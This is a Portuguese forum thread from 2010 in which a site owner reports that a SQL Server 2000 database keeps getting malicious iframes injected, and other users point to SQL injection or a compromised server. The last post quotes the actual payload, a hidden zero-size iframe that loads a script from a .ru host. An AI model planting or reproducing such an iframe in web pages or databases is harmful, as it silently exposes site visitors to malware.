Virus no banco

[marvi]

Olá pessoal,

O meu site pegou um vírus, no banco de dados SQL Server 2000, na verdade, foram dois sites distintos, mas que estão dentro do mesmo servidor de hospedagem. Um site eliminei até a conta e o banco, outro site desativei e limpei o banco onde tinha o vírus.

O vírus fica no campo do SQL tipo <iframe> http://umsitela.php..</iframe> algo assim.

Só que passa um tempo esse vírus aparece numa outra tabela também, automaticamente.

Como resolver isso? O problema já está no servidor? Mesmo o site desativado, sem uso, com o banco limpo desse vírus, eles aparecem.

Desde já, agradeço!

[ARD]

Pesquise sobre sql injection.

Até +

André

[fulvio]

Bom dia Marvi,

Nunca ouvi falar de virus presente no Banco de Dados. Os virus com certeza atacam as bases, mas não ficam "hospedados" nele.

O comando <iframe> é um código HTML que permite você abrir uma página dentro de outra e exibir algum conteúdo extra.

Há vários tipos de virus. Se o Servidor estiver infectado, terá que limpá-lo. Dependendo do virus, mesmo sem acesso a rede, sem sites no ar, eles "aparecem".

Moverei seu tópico para o Forum Fórum Script Brasil > Segurança e Malwares > Remoção De Malwares.

[marvi]

SIm, sobre o injetct já conheço e está ok

Será que o problema está com o servidor, que está infectado?

encontra o virus "<iframe src="http://nemohuildiin.ru/todos/go.php?sid=1" width="0" height="0" style="display:none"></iframe>" no banco de dados na tabela

Ele se repete nos outros campos, limpa e ele volta em campos variados e o navegador acusa vírus e google também

Editado Agosto 12, 2010 por marvi